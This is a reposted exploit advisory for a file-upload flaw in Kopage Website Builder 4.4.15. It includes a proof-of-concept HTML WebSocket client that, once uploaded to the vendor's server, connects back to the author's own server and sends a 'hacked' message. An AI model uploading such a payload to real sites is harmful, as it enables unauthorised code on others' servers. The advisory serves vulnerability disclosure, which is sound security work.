Kopage Website Builder 4.4.15 Shell Upload
2023-12-8 23:38:37 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/08/2023
## Vendor: https://www.kopage.com/
## Software: https://demo.kopage.com/index.php
## Reference: https://portswigger.net/web-security/file-upload,
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The file upload function suffers from file upload vulnerability, there
is no strong sanitizing function for uploading some extension files.
In this case, I uploaded an HTML web socket client on their server and
then I connected this client with my javascript server =)
Depending on the scenario, this can be the end of privacy and even
worse than ever!
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: CRITICAL Vulnerability

[+]Exploit client:
```POST
<html>
<script>
(() => {
const ws = new WebSocket('ws://0.0.0.0:8080')
ws.onopen = () => {
console.log('ws opened on browser')
ws.send('hello world you are hacked :D')
}

ws.onmessage = (message) => {
console.log(`message received ${message}`)
}

})()
</script>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)

## Time spent:
00:35:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


文章来源: https://packetstormsecurity.com/files/176111/kopagewb4415-shell.txt
如有侵权请联系:admin#unsafe.sh